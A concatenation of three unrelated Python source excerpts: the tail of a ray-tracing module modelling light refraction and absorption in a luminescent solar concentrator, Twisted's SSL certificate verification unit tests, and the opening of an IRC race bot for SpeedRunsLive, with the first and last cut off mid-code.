matrix_path = ((-1 / matrix_abco) * math.log(random.uniform(0, 1)))
return matrix_path
def surface_absorption(wave_len, wave_len_min, wave_len_max, abs_surface):
"""Determines probability of absorption as a function of wavelength at a
particular boundary.
Parameters
----------
wave_len : float
Bundle wavelength
wave_len_min : float
Minimum wavelength absorbed by matrix
wave_len_max : float
Maximum wavelength absorbed by matrix
abs_surface : DataFrame
Probability of absorption of a surface as a function of wavelength
Returns
-------
probability : float
Probability that a bundle is absorbed
Notes
-----
surface_absorption should be renamed to boundary_absorption
"""
probability = 0
if wave_len >= wave_len_min and wave_len <= wave_len_max:
probability = abs_surface.__call__(wave_len)
return probability
def refracted_vect(n_i, n_f, vect):
"""Determines refracted angle based on incoming vector and index of
refraction of 1st/2nd mediums
Parameters
----------
n_i : float
Index of refraction of the current medium
n_f : float
Index of refraction of the medium a bundle is attempting to enter
vect : NumPy array
Current bundle trajectory in local coordinates
Returns
-------
refr_vect : NumPy array, string
Refracted vector - bundle trajectory after refraction. If no refraction
occurred, the output is a string.
Notes
-----
"""
[theta, phi] = cart2sph(vect)
# solve Snell's law to evaluate critical angle
reflect_test = math.sin(theta) * n_i / n_f
# test for critical angle
if (n_f < n_i) and (reflect_test > 1):
refr_vect = "no refraction"
# use Snell's law to solve for the refracted vector
else:
refr_angle = math.asin(reflect_test)
# realign refr_angle within one quadrant
if theta > (math.pi/2):
refr_angle = math.pi - refr_angle
refr_vect = sph2cart(refr_angle, phi)
return refr_vect
def reflectivity(vect, refracted_vect):
"""Calculate reflectivity at an interface using Fresnel's equations. Light
is assumed to be unpolarized.
Parameters
----------
vect : NumPy array
Current bundle trajectory in local coordinates
refr_vect : NumPy array, string
Refracted vector - bundle trajectory after refraction. If refraction
was impossible, this is a string.
Returns
-------
rho : float
Reflectivity at an interface calculated using Fresnel's equations
Notes
-----
"""
if isinstance(refracted_vect, str) is False:
[xi, phi] = cart2sph(refracted_vect)
[theta, phi] = cart2sph(vect)
# apply Fresnel's equations for reflectivity to determine reflectivity
rho = 0.5 * ((math.tan(theta - xi))**2 / (math.tan(theta + xi))**2 +
(math.sin(theta - xi))**2/(math.sin(theta + xi))**2)
else:
rho = 1 # critical angle was achieved ensuring reflection
return rho
def refraction_or_reflection(rho, vect, tilt, refracted_vect, indexmatch,
n, surface_type = 'specular'):
"""Determine if a bundle is refracted or reflected at an interface.
Parameters
----------
rho : float
Reflectivity at an interface calculated using Fresnel's equations
vect : NumPy array
Current bundle trajectory in local coordinates
tilt : float
Boundary angle relative to the xy plane
refracted_vect : NumPy array, string
Refracted vector - bundle trajectory after refraction. If refraction
was impossible, this is a string.
indexmatch : int
If indexmatch is 1, bundle remains in the same volume or is lost
If indexmatch is 0, bundle has the opportunity to move to an
adjacent volume.
n : NumPy array
Normal vector of a boundary, faces inward towards center of the volume
surface_type : string, optional
Indicates the behavior of reflected bundles, options are:
(1) Specular
(2) Diffuse
Returns
-------
theta : float
Polar incidence angle (classically defined as just the incidence
angle) in global coordinates. This is a spherical coordinate.
phi : float
Azimuthal incidence angle in global coordinates. This is a
spherical coordinate.
bundle_reflect_stay : int
Bundle is reflected but remains within the LSC (1) otherwise (0)
bundle_reflect_lost : int
Bundle is reflected and is lost (1) otherwise (0)
bundle_refract_lost : int
Bundle is refracted out of the LSC (1) otherwise (0)
Notes
-----
There is an excess rotation to produce "ray_vector", this could be included
within bundle_reflection and/or bundle_reflection and processed there
instead.
"""
bundle_reflect_stay = 0
bundle_reflect_lost = 0
bundle_refract_lost = 0
# ray_vector : NumPy array
# reflected/refracted vector in local coordinates
# ray_normal_angle : NumPy array
# Angle between surface normal and reflected/refracted vector
if random.uniform(0, 1) < rho:
[theta, phi] = bundle_reflection(surface_type, vect, tilt, n)
ray_vector = sph2cart(theta, phi)
ray_vector = rm.rot(tilt, ray_vector, n) # rotate into local coords
ray_normal_angle = tilt_angle(ray_vector)
if ray_normal_angle < 0:
ray_normal_angle = 2*math.pi + ray_normal_angle
# if outgoing angle will cause bundle to move in opposite direction of
# normal, otherwise bundle stays in LSC
if ((3*math.pi/2) > ray_normal_angle > (math.pi/2)):
bundle_reflect_lost = 1
else:
bundle_reflect_stay = 1
else:
[theta, phi] = bundle_refraction(surface_type, refracted_vect, tilt, n)
ray_vector = sph2cart(theta, phi)
ray_vector = rm.rot(tilt, ray_vector, n) # rotate into local coords
ray_normal_angle = tilt_angle(ray_vector)
if ray_normal_angle < 0:
ray_normal_angle = 2 * math.pi + ray_normal_angle
# if outgoing angle will cause bundle to move in opposite direction of
# the normal and bundle will not enter a new volume then the bundle is
# lost. Otherwise, the bundle stays in the LSC
if (((3 * math.pi / 2) > ray_normal_angle > (math.pi / 2))
and (indexmatch == 1)):
bundle_refract_lost = 1
return [theta, phi, bundle_reflect_stay,
bundle_reflect_lost, bundle_refract_lost]
def bundle_reflection(surface_type, vect, tilt, n):
"""Determine bundle trajectory upon reflection. Currently, bundles can be
reflected specularly or diffusely.
Parameters
----------
vect : NumPy array
Current bundle trajectory in local coordinates
tilt : float
Boundary angle relative to the xy plane
n : NumPy array
Normal vector of a boundary, faces inward towards center of the volume
surface_type : string, optional
Indicates the behavior of reflected bundles, options are:
(1) Specular
(2) Diffuse
Returns
-------
theta : float
Polar incidence angle (classically defined as just the incidence
angle) in global coordinates. This is a spherical coordinate.
phi : float
Azimuthal incidence angle in global coordinates. This is a
spherical coordinate.
Notes
-----
"""
if surface_type == 'specular':
vect = np.array(vect) * -1 # flip direction of vector
vect = rm.z(math.pi, vect) # rotate 180 around normal
vect = rm.rot(-tilt, vect, n) # rotate back to global coords
[theta, phi] = cart2sph(vect)
return [theta, phi]
elif surface_type == 'diffuse':
theta_rand = math.asin(math.sqrt(random.uniform(0, 1)))
phi_rand = 2 * math.pi * random.uniform(0, 1)
vect = sph2cart(theta_rand, phi_rand)
vect = rm.rot(-tilt, vect, n) # rotate back to global coords
[theta, phi] = cart2sph(vect)
return[theta, phi]
else:
print("The type of surface you have selected is not available")
def bundle_refraction(surface_type, refracted_vect, tilt, n):
"""Determine bundle trajectory upon refraction. Currently, bundles can be
refracted specularly or diffusely.
Parameters
----------
vect : NumPy array
Current bundle trajectory in local coordinates
tilt : float
Boundary angle relative to the xy plane
n : NumPy array
Normal vector of a boundary, faces inward towards center of the volume
surface_type : string, optional
Indicates the behavior of reflected bundles, options are:
(1) Specular
(2) Diffuse
Returns
-------
theta : float
Polar incidence angle (classically defined as just the incidence
angle) in global coordinates. This is a spherical coordinate.
phi : float
Azimuthal incidence angle in global coordinates. This is a
spherical coordinate.
Notes
-----
"""
if surface_type == 'specular':
vect = rm.rot(-tilt, refracted_vect, n) # rotate back to global coords
[theta, phi] = cart2sph(vect)
return [theta, phi]
elif surface_type == 'diffuse':
theta_rand = math.asin(math.sqrt(random.uniform(0, 1)))
phi_rand = 2 * math.pi * random.uniform(0, 1)
vect = sph2cart(theta_rand, phi_rand)
vect = rm.rot(-tilt, vect, n) # rotate back to global coords
[theta, phi] = cart2sph(vect)
return[theta, phi]
else:
print("The type of surface you have selected is not available")
def surface_efficiency(efficiency):
"""Determine if a bundle is absorbed or not based on a float number.
Parameters
----------
efficiency : float
efficiency of a surface (perfect mirror has an efficiency of 0, a
perfect absorbed has an efficiency of 1)
Returns
-------
reset : int
Bundle is absorbed (1), bundle continues (2)
Notes
-----
This should be combined with surface absorption.
"""
if random.uniform(0, 1) <= efficiency:
reset = 1
else:
reset = 0
return reset
def photon_generation(wave_len, energy):
"""Determine number of photons in a bundle
Parameters
----------
wave_len : float
Wavelength associated with a particular bundle
energy : float
Energy in a bundle
Returns
-------
nphoton : float
Number of photons in a bundle as a function of wavelength
Notes
-----
"""
nphoton = 0
h = 6.626e-34 # [joule*s] planck's constant
c = 2.998e8 # [m/s] speed of light
ephoton = (h*c)/(wave_len*1e-9) # find energy in a photon
if wave_len <= 1107:
nphoton = energy/ephoton
return nphoton
def refracted_vect_flip(n, bdy_center, n_max, p_o, p_i, vect):
"""Determines if a bundle is attempting to leave an LSC or if it is
attempting to enter the LSC. Then, finds the refracted vector.
Parameters
----------
n : NumPy array
Normal vector of a boundary, faces inward towards center of the volume
bdy_center : NumPy array
Center point of a boundary in 3D
n_max : float
Index of refraction of matrix
p_o : NumPy array
Confirmed bundle position. This is where the bundle currently resides
within the LSC.
p_i : NumPy array
Potential bundle position. This is where a bundle would intersect if
it is not interrupted on the way (i.e. absorbed by the matrix or bundle
intersects a particle).
vect : NumPy array
Current bundle trajectory in global coordinates
Returns
-------
refracted_vect: NumPy array
Notes
-----
This is set up with the assumption that the exterior is air, this is fine,
but not the most elegant
"""
# find point on the normal that is very far away
exterior_point = bdy_center + np.array(100000 * n)
# find distance between distant point and initial position
dist_ext_point_p_o = np.linalg.norm(exterior_point - np.array(p_o))
# find distance between distant point and potential intersect
dist_ext_point_p_i = np.linalg.norm(exterior_point - np.array(p_i))
# if distance to initial point is less than distance to potential
# intersect then bundle is attempting to leave the volume, otherwise it
# must be attempting to enter the volume.
refract_vect = 0
if dist_ext_point_p_o < dist_ext_point_p_i:
refract_vect = refracted_vect(n_max, 1.0, vect)
else:
refract_vect = refracted_vect(1.0, n_max, vect)
return refract_vect
def incidence_angle(n, n_o):
"""Calculate incidence angle between two vectors
Parameters
----------
n : NumPy array
normal vector of second boundary
n_o : NumPy array
normal vector of first boundary or the xy plane (z-axis)
Returns
-------
theta_i: float
Polar incidence angle between two normals
Notes
-----
This needs to be improved if more complex geometries are to be evaluated.
Currently, boundaries must either run parallel to the x-axis or their
surface normal must run parallel to the x-axis.
"""
n = np.array(n)
n_o = np.array(n_o)
dot = np.dot(n, n_o)
# calculate incidence angle in radians
if math.isclose(dot,-1,abs_tol = 1e-7):
theta_i = math.pi
elif math.isclose(dot, 1, abs_tol = 1e-7):
theta_i = 0
else:
theta_i = math.acos(dot)
# flip direction of angle if cross product between two vectors is negative
cross = np.cross(n, n_o)
# if x or y coordinates are negative then flip sign of incidence angle
if list(abs(n_o)) == [1,0,0]:
if cross[1] < 0:
theta_i = -theta_i
else:
if cross[0] < 0:
theta_i = -theta_i
return theta_i
def tilt_angle(n):
"""Calculate incidence angle between normal vector of a boundary and the
z-axis of the global coordinate system.
Parameters
----------
n : NumPy array
Normal vector of a boundary, faces inward towards center of the volume
Returns
-------
theta_i: float
Polar incidence angle between boundary normal and global z-axis
Notes
-----
This should be consolidated with incidence_angle function, they are doing
pretty much the same thing.
This needs to be improved if more complex geometries are to be evaluated.
Currently, boundaries must either run parallel to the x-axis or their
surface normal must run parallel to the x-axis.
"""
n = np.array(n)
n_glob = np.array([0,0,1])
dot = np.dot(n, n_glob) # calculate dot product of two surface normals
# calculate incidence angle in radians
if math.isclose(dot,-1,abs_tol = 1e-7):
theta_i = math.pi
elif math.isclose(dot, 1, abs_tol = 1e-7):
theta_i = 0
else:
theta_i = math.acos(dot)
# flip direction of angle if cross product between two vectors is negative
cross = np.cross(n, n_glob)
# if x or y coordinates are negative then flip sign of incidence angle
if list(abs(n)) == [1,0,0]:
if cross[1] < 0:
theta_i = -theta_i
else:
if cross[0] < 0:
theta_i = -theta_i
return theta_i
def find_bdy_center(polygon):
"""Find center point of a boundary
Parameters
----------
polygon : NumPy array
Set of at least three vertices in the same plane
Returns
-------
center : NumPy array
Center point of a boundary
Notes
-----
"""
polygon = np.array(polygon)
center = sum(polygon)/len(polygon)
return center
def find_normal_vector(polygon, bdy_center, vol_center):
"""Given a polygon (four points), and the center of a volume, reports the
normal vector of the corresponding plane facing inward towards the center.
This is necessary because it will eventually help determine bundle
intersection based on relative direction of a bundle to the direction of
the normal vector (i.e. the way to tell if a bundle is moving upwards or
downwards is to check trajectory against the normal)
Parameters
----------
polygon : list, NumPy array
Set of at least three vertices in the same plane
bdy_center : NumPy array
Center point of a boundary
vol_center : list, NumPy array
Center point of a volume
Returns
-------
unit_vector : NumPy array
unit normal vector of a boundary facing inward
Notes
-----
"""
polygon = np.array(polygon)
vol_center = np.array(vol_center)
# Use three points to establish two vectors in plane
v1 = polygon[2] - polygon[0]
v2 = polygon[1] - polygon[0]
# the cross product of these two vectors is a vector normal to the plane
cp = np.cross(v1, v2)
a, b, c = cp
# check to see if unit normal vector is facing the correct direction by
# checking distance to tip of unit normal vector against volume center
unit_vector = cp / np.linalg.norm(cp)
dist_center = np.linalg.norm(bdy_center - vol_center)
dist_with_normal = np.linalg.norm(bdy_center + unit_vector
* dist_center - vol_center)
# if distance to the center is lower than distance to tip of normal vector
# then flip direction of unit vector to ensure it is pointing inward
if(dist_center < dist_with_normal):
unit_vector *= -1
return unit_vector
def find_vol_center(bdy_points):
"""Find center point of a volume
Parameters
----------
bdy_points : list
The coordinates of each vertice of a volume.
Returns
-------
center : NumPy array
Center point of a volume
Notes
-----
"""
all_points = [] # initalize array to house all individual points
# for every boundary extract points
for j in range(0, len(bdy_points)):
points_from_polygon = np.array(bdy_points[j])
for k in range(0, len(points_from_polygon)):
point_from_polygon = points_from_polygon[k]
all_points.append(point_from_polygon)
# eliminate all duplicate points
unique_points = np.unique(all_points, axis=0)
center = sum(unique_points) / len(unique_points)
return center
def find_vol_dimensions(bdy_points):
"""Find center point of a volume
Parameters
----------
bdy_points : list
The coordinates of each vertice of a volume.
Returns
-------
Lx: float
Length of the LSC in the x-direction.
Ly: float
Length of the LSC in the y-direction.
Lz: float
Length of the LSC in the z-direction.
Notes
-----
"""
# create list of individual volume vertices
vertices = []
for bdy in bdy_points:
vertices += bdy
# create lists of all coordinate values
vertexcount = len(vertices)
x = np.zeros(vertexcount)
y = np.zeros(vertexcount)
z = np.zeros(vertexcount)
for vertex in range(0, vertexcount):
x[vertex] = vertices[vertex][0]
y[vertex] = vertices[vertex][1]
z[vertex] = vertices[vertex][2]
# subtract highest coordinate from lowest coordinate to get lengths
Lx = max(x) - min(x)
Ly = max(y) - min(y)
Lz = max(z) - min(z)
return Lx, Ly, Lz
|
<reponame>84KaliPleXon3/sslstrip-hsts-openwrt<gh_stars>1-10
# Copyright 2005 Divmod, Inc. See LICENSE file for details
import itertools
from OpenSSL import SSL
from OpenSSL.crypto import PKey, X509, X509Req
from OpenSSL.crypto import TYPE_RSA
from twisted.trial import unittest
from twisted.internet import protocol, defer, reactor
from twisted.python import log
from twisted.python.reflect import objgrep, isSame
from twisted.internet import _sslverify as sslverify
from twisted.internet.error import CertificateError
# A couple of static PEM-format certificates to be used by various tests.
A_HOST_CERTIFICATE_PEM = """
-----BEGIN CERTIFICATE-----
MI<KEY>
<KEY>
I<KEY>
Ym9keUB0d2lzdGVkbWF0cml4LmNvbTERMA8GA1UECxMIU2VjdXJpdHkwgZ8wDQYJ
KoZIhvcNAQEBBQADgY0AMIGJAoGBAMzH8CDF/U91y/bdbdbJKnLgnyvQ9Ig9ZNZp
8hpsu4huil60zF03+Lexg2l1FIfURScjBuaJMR6HiMYTMjhzLuByRZ17KW4wYkGi
KXstz03VIKy4Tjc+v4aXFI4XdRw10gGMGQlGGscXF/RSoN84VoDKBfOMWdXeConJ
VyC4w3iJAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAviMT4lBoxOgQy32LIgZ4lVCj
JNOiZYg8GMQ6y0ugp86X80UjOvkGtNf/R7YgED/giKRN/q/XJiLJDEhzknkocwmO
S+4b2XpiaZYxRyKWwL221O7CGmtWYyZl2+92YYmmCiNzWQPfP6BOMlfax0AGLHls
fXzCWdG0O/3Lk2SRM0I=
-----END CERTIFICATE-----
"""
A_PEER_CERTIFICATE_PEM = """
-----BEGIN CERTIFICATE-----
MIIC3jCCAkcCAjA6MA0GCSqGSIb3DQEBBAUAMIG2MQswCQYDVQQGEwJVUzEiMCAG
A<KEY>
MR<KEY>
dXNldHRzMSkwJwYJKoZIhvcNAQkBFhpzb21lYm9keUB0d2lzdGVkbWF0cml4LmNv
bTERMA8GA<KEY>
-----END CERTIFICATE-----
"""
counter = itertools.count().next
def makeCertificate(**kw):
keypair = PKey()
keypair.generate_key(TYPE_RSA, 1024)
certificate = X509()
certificate.gmtime_adj_notBefore(0)
certificate.gmtime_adj_notAfter(60 * 60 * 24 * 365) # One year
for xname in certificate.get_issuer(), certificate.get_subject():
for (k, v) in kw.items():
setattr(xname, k, v)
certificate.set_serial_number(counter())
certificate.set_pubkey(keypair)
certificate.sign(keypair, "md5")
return keypair, certificate
def otherMakeCertificate(**kw):
keypair = PKey()
keypair.generate_key(TYPE_RSA, 1024)
req = X509Req()
subj = req.get_subject()
for (k, v) in kw.items():
setattr(subj, k, v)
req.set_pubkey(keypair)
req.sign(keypair, "md5")
cert = X509()
cert.set_serial_number(counter())
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(60 * 60 * 24 * 365) # One year
cert.set_issuer(req.get_subject())
cert.set_subject(req.get_subject())
cert.set_pubkey(req.get_pubkey())
cert.sign(keypair, "md5")
return keypair, cert
class DataCallbackProtocol(protocol.Protocol):
def dataReceived(self, data):
d, self.factory.onData = self.factory.onData, None
if d is not None:
d.callback(data)
def connectionLost(self, reason):
d, self.factory.onLost = self.factory.onLost, None
if d is not None:
d.errback(reason)
class WritingProtocol(protocol.Protocol):
byte = 'x'
def connectionMade(self):
self.transport.write(self.byte)
def connectionLost(self, reason):
self.factory.onLost.errback(reason)
class OpenSSLOptions(unittest.TestCase):
serverPort = clientConn = None
onServerLost = onClientLost = None
def setUpClass(self):
self.sKey, self.sCert = makeCertificate(
O="Server Test Certificate",
CN="server")
self.cKey, self.cCert = makeCertificate(
O="Client Test Certificate",
CN="client")
def tearDown(self):
if self.serverPort is not None:
self.serverPort.stopListening()
if self.clientConn is not None:
self.clientConn.disconnect()
L = []
if self.onServerLost is not None:
L.append(self.onServerLost)
if self.onClientLost is not None:
L.append(self.onClientLost)
return defer.DeferredList(L, consumeErrors=True)
def loopback(self, serverCertOpts, clientCertOpts,
onServerLost=None, onClientLost=None, onData=None):
if onServerLost is None:
self.onServerLost = onServerLost = defer.Deferred()
if onClientLost is None:
self.onClientLost = onClientLost = defer.Deferred()
if onData is None:
onData = defer.Deferred()
serverFactory = protocol.ServerFactory()
serverFactory.protocol = DataCallbackProtocol
serverFactory.onLost = onServerLost
serverFactory.onData = onData
clientFactory = protocol.ClientFactory()
clientFactory.protocol = WritingProtocol
clientFactory.onLost = onClientLost
self.serverPort = reactor.listenSSL(0, serverFactory, serverCertOpts)
self.clientConn = reactor.connectSSL('127.0.0.1', self.serverPort.getHost().port,
clientFactory, clientCertOpts)
def testAbbreviatingDistinguishedNames(self):
self.assertEquals(sslverify.DN(CN='a', OU='hello'),
sslverify.DistinguishedName(commonName='a', organizationalUnitName='hello'))
self.assertNotEquals(sslverify.DN(CN='a', OU='hello'),
sslverify.DN(CN='a', OU='hello', emailAddress='xxx'))
dn = sslverify.DN(CN='abcdefg')
self.assertRaises(AttributeError, setattr, dn, 'Cn', 'x')
self.assertEquals(dn.CN, dn.commonName)
dn.CN = 'bcdefga'
self.assertEquals(dn.CN, dn.commonName)
def testInspectDistinguishedName(self):
n = sslverify.DN(commonName='common name',
organizationName='organization name',
organizationalUnitName='organizational unit name',
localityName='locality name',
stateOrProvinceName='state or province name',
countryName='country name',
emailAddress='email address')
s = n.inspect()
for k in [
'common name',
'organization name',
'organizational unit name',
'locality name',
'state or province name',
'country name',
'email address']:
self.assertIn(k, s, "%r was not in inspect output." % (k,))
self.assertIn(k.title(), s, "%r was not in inspect output." % (k,))
def testInspectDistinguishedNameWithoutAllFields(self):
n = sslverify.DN(localityName='locality name')
s = n.inspect()
for k in [
'common name',
'organization name',
'organizational unit name',
'state or province name',
'country name',
'email address']:
self.assertNotIn(k, s, "%r was in inspect output." % (k,))
self.assertNotIn(k.title(), s, "%r was in inspect output." % (k,))
self.assertIn('locality name', s)
self.assertIn('Locality Name', s)
def test_inspectCertificate(self):
"""
Test that the C{inspect} method of L{sslverify.Certificate} returns
a human-readable string containing some basic information about the
certificate.
"""
c = sslverify.Certificate.loadPEM(A_HOST_CERTIFICATE_PEM)
self.assertEqual(
c.inspect().split('\n'),
["Certificate For Subject:",
" Organizational Unit Name: Security",
" Organization Name: Twisted Matrix Labs",
" Common Name: example.twistedmatrix.com",
" State Or Province Name: Massachusetts",
" Country Name: US",
" Email Address: <EMAIL>",
" Locality Name: Boston",
"",
"Issuer:",
" Organizational Unit Name: Security",
" Organization Name: Twisted Matrix Labs",
" Common Name: example.twistedmatrix.com",
" State Or Province Name: Massachusetts",
" Country Name: US",
" Email Address: <EMAIL>",
" Locality Name: Boston",
"",
"Serial Number: 12345",
"Digest: C4:96:11:00:30:C3:EC:EE:A3:55:AA:ED:8C:84:85:18",
"Public Key with Hash: ff33994c80812aa95a79cdb85362d054"])
def test_certificateOptionsSerialization(self):
"""
Test that __setstate__(__getstate__()) round-trips properly.
"""
firstOpts = sslverify.OpenSSLCertificateOptions(
privateKey=self.sKey,
certificate=self.sCert,
method=SSL.SSLv3_METHOD,
verify=True,
caCerts=[self.sCert],
verifyDepth=2,
requireCertificate=False,
verifyOnce=False,
enableSingleUseKeys=False,
enableSessions=False,
fixBrokenPeers=True)
context = firstOpts.getContext()
state = firstOpts.__getstate__()
# The context shouldn't be in the state to serialize
self.failIf(objgrep(state, context, isSame), objgrep(state, context, isSame))
opts = sslverify.OpenSSLCertificateOptions()
opts.__setstate__(state)
self.assertEqual(opts.privateKey, self.sKey)
self.assertEqual(opts.certificate, self.sCert)
self.assertEqual(opts.method, SSL.SSLv3_METHOD)
self.assertEqual(opts.verify, True)
self.assertEqual(opts.caCerts, [self.sCert])
self.assertEqual(opts.verifyDepth, 2)
self.assertEqual(opts.requireCertificate, False)
self.assertEqual(opts.verifyOnce, False)
self.assertEqual(opts.enableSingleUseKeys, False)
self.assertEqual(opts.enableSessions, False)
self.assertEqual(opts.fixBrokenPeers, True)
def testAllowedAnonymousClientConnection(self):
onData = defer.Deferred()
self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, requireCertificate=False),
sslverify.OpenSSLCertificateOptions(requireCertificate=False),
onData=onData)
return onData.addCallback(
lambda result: self.assertEquals(result, WritingProtocol.byte))
def testRefusedAnonymousClientConnection(self):
onServerLost = defer.Deferred()
onClientLost = defer.Deferred()
self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=True, caCerts=[self.sCert], requireCertificate=True),
sslverify.OpenSSLCertificateOptions(requireCertificate=False),
onServerLost=onServerLost,
onClientLost=onClientLost)
d = defer.DeferredList([onClientLost, onServerLost], consumeErrors=True)
def afterLost(((cSuccess, cResult), (sSuccess, sResult))):
self.failIf(cSuccess)
self.failIf(sSuccess)
# XXX Twisted doesn't report SSL errors as SSL errors, but in the
# future it will.
# cResult.trap(SSL.Error)
# sResult.trap(SSL.Error)
# Twisted trunk will do the correct thing here, and not log any
# errors. Twisted 2.1 will do the wrong thing. We're flushing
# errors until the buildbot is updated to a reasonable facsimilie
# of 2.2.
log.flushErrors(SSL.Error)
return d.addCallback(afterLost)
def testFailedCertificateVerification(self):
onServerLost = defer.Deferred()
onClientLost = defer.Deferred()
self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=False, requireCertificate=False),
sslverify.OpenSSLCertificateOptions(verify=True, requireCertificate=False, caCerts=[self.cCert]),
onServerLost=onServerLost,
onClientLost=onClientLost)
d = defer.DeferredList([onClientLost, onServerLost], consumeErrors=True)
def afterLost(((cSuccess, cResult), (sSuccess, sResult))):
self.failIf(cSuccess)
self.failIf(sSuccess)
# Twisted trunk will do the correct thing here, and not log any
# errors. Twisted 2.1 will do the wrong thing. We're flushing
# errors until the buildbot is updated to a reasonable facsimilie
# of 2.2.
log.flushErrors(SSL.Error)
return d.addCallback(afterLost)
def testSuccessfulCertificateVerification(self):
onData = defer.Deferred()
self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=False, requireCertificate=False),
sslverify.OpenSSLCertificateOptions(verify=True, requireCertificate=True, caCerts=[self.sCert]),
onData=onData)
return onData.addCallback(lambda result: self.assertEquals(result, WritingProtocol.byte))
def testSuccessfulSymmetricSelfSignedCertificateVerification(self):
onData = defer.Deferred()
self.loopback(sslverify.OpenSSLCertificateOptions(privateKey=self.sKey, certificate=self.sCert, verify=True, requireCertificate=True, caCerts=[self.cCert]),
sslverify.OpenSSLCertificateOptions(privateKey=self.cKey, certificate=self.cCert, verify=True, requireCertificate=True, caCerts=[self.sCert]),
onData=onData)
return onData.addCallback(lambda result: self.assertEquals(result, WritingProtocol.byte))
def testVerification(self):
clientDN = sslverify.DistinguishedName(commonName='client')
clientKey = sslverify.KeyPair.generate()
clientCertReq = clientKey.certificateRequest(clientDN)
serverDN = sslverify.DistinguishedName(commonName='server')
serverKey = sslverify.KeyPair.generate()
serverCertReq = serverKey.certificateRequest(serverDN)
##
clientSelfCertReq = clientKey.certificateRequest(clientDN)
clientSelfCertData = clientKey.signCertificateRequest(clientDN, clientSelfCertReq,
lambda dn: True,
132)
clientSelfCert = clientKey.newCertificate(clientSelfCertData)
##
##
serverSelfCertReq = serverKey.certificateRequest(serverDN)
serverSelfCertData = serverKey.signCertificateRequest(serverDN, serverSelfCertReq,
lambda dn: True,
516)
serverSelfCert = serverKey.newCertificate(serverSelfCertData)
##
##
clientCertData = serverKey.signCertificateRequest(serverDN, clientCertReq,
lambda dn: True,
7)
clientCert = clientKey.newCertificate(clientCertData)
##
##
serverCertData = clientKey.signCertificateRequest(clientDN, serverCertReq,
lambda dn: True,
42)
serverCert = serverKey.newCertificate(serverCertData)
##
onData = defer.Deferred()
serverOpts = serverCert.options(serverSelfCert)
clientOpts = clientCert.options(clientSelfCert)
self.loopback(serverOpts,
clientOpts,
onData=onData)
return onData.addCallback(lambda result: self.assertEquals(result, WritingProtocol.byte))
class _NotSSLTransport:
def getHandle(self):
return self
class _MaybeSSLTransport:
def getHandle(self):
return self
def get_peer_certificate(self):
return None
def get_host_certificate(self):
return None
class _ActualSSLTransport:
def getHandle(self):
return self
def get_host_certificate(self):
return sslverify.Certificate.loadPEM(A_HOST_CERTIFICATE_PEM).original
def get_peer_certificate(self):
return sslverify.Certificate.loadPEM(A_PEER_CERTIFICATE_PEM).original
class Constructors(unittest.TestCase):
def test_peerFromNonSSLTransport(self):
"""
Verify that peerFromTransport raises an exception if the transport
passed is not actually an SSL transport.
"""
x = self.assertRaises(CertificateError,
sslverify.Certificate.peerFromTransport,
_NotSSLTransport())
self.failUnless(str(x).startswith("non-TLS"))
def test_peerFromBlankSSLTransport(self):
"""
Verify that peerFromTransport raises an exception if the transport
passed is an SSL transport, but doesn't have a peer certificate.
"""
x = self.assertRaises(CertificateError,
sslverify.Certificate.peerFromTransport,
_MaybeSSLTransport())
self.failUnless(str(x).startswith("TLS"))
def test_hostFromNonSSLTransport(self):
"""
Verify that hostFromTransport raises an exception if the transport
passed is not actually an SSL transport.
"""
x = self.assertRaises(CertificateError,
sslverify.Certificate.hostFromTransport,
_NotSSLTransport())
self.failUnless(str(x).startswith("non-TLS"))
def test_hostFromBlankSSLTransport(self):
"""
Verify that hostFromTransport raises an exception if the transport
passed is an SSL transport, but doesn't have a host certificate.
"""
x = self.assertRaises(CertificateError,
sslverify.Certificate.hostFromTransport,
_MaybeSSLTransport())
self.failUnless(str(x).startswith("TLS"))
def test_hostFromSSLTransport(self):
"""
Verify that hostFromTransport successfully creates the correct certificate
if passed a valid SSL transport.
"""
self.assertEqual(
sslverify.Certificate.hostFromTransport(
_ActualSSLTransport()).serialNumber(),
12345)
def test_peerFromSSLTransport(self):
"""
Verify that peerFromTransport successfully creates the correct certificate
if passed a valid SSL transport.
"""
self.assertEqual(
sslverify.Certificate.peerFromTransport(
_ActualSSLTransport()).serialNumber(),
12346)
|
<reponame>floresmatthew/sahasrahbot<gh_stars>0
import asyncio
import datetime
import aiofiles
import logging
import pydle
from alttprbot.database import srl_races
from alttprbot.exceptions import SahasrahBotException
from alttprbot.util.srl import get_all_races, get_race
from alttprbot_srl import commands, racebot
from config import Config as c
class SrlBot(pydle.Client):
async def on_connect(self):
await self.message('NickServ', 'identify ' + c.SRL_PASSWORD)
await self.join('#speedrunslive')
await self.join('#alttpr')
if c.DEBUG:
await self.join('#srl-synack-testing')
# target = channel of the message
# source = sendering of the message
# message = the message, duh
async def on_message(self, target, source, message):
try:
await message_logger("MSG", target, source, message)
# filter messages sent by the bot (we do not want to react to these)
if source == c.SRL_NICK:
return
# handle messages from racebot
await racebot.handler(target=target, source=source, message=message, client=self)
# handle user commands
await commands.handler(target=target, source=source, message=message, client=self)
except Exception as err:
await self.message(target, f'{type(err)}: "{str(err)}". Please contact Synack if this condition persists.')
if not isinstance(err, SahasrahBotException):
raise
# target = you
# source = sendering of the message
# message = the message, duh
async def on_notice(self, target, source, message):
await message_logger("NOTICE", target, source, message)
# do stuff that we want after getting recognized by NickServ
if message == 'Password accepted - you are now recognized.':
await asyncio.sleep(1)
# await self.join('#speedrunslive')
# await self.join('#alttpr')
await self.join_active_races(['supermetroidhacks', 'supermetroid'])
await self.process_active_races()
# if c.DEBUG: await self.join('#srl-synack-testing')
async def on_join(self, channel, user):
await message_logger("JOIN", channel, user, "Joined channel.")
async def on_part(self, channel, user, message):
await message_logger("PART", channel, user, message)
async def on_kick(self, channel, target, by, reason=None):
await message_logger("KICK", channel, target, f"Kicked by {by} for reason {reason}")
async def on_kill(self, target, by, reason):
await message_logger("KILL", target, by, f"Killed for reason {reason}")
async def on_mode_change(self, channel, modes, by):
await message_logger("MODE", channel, by, f'Gave {modes[0]} to {modes[1]}')
async def on_topic_change(self, channel, message, by):
await message_logger("TOPIC", channel, by, message)
await racebot.topic_change_handler(channel, by, message, client=self)
async def join_active_races(self, games):
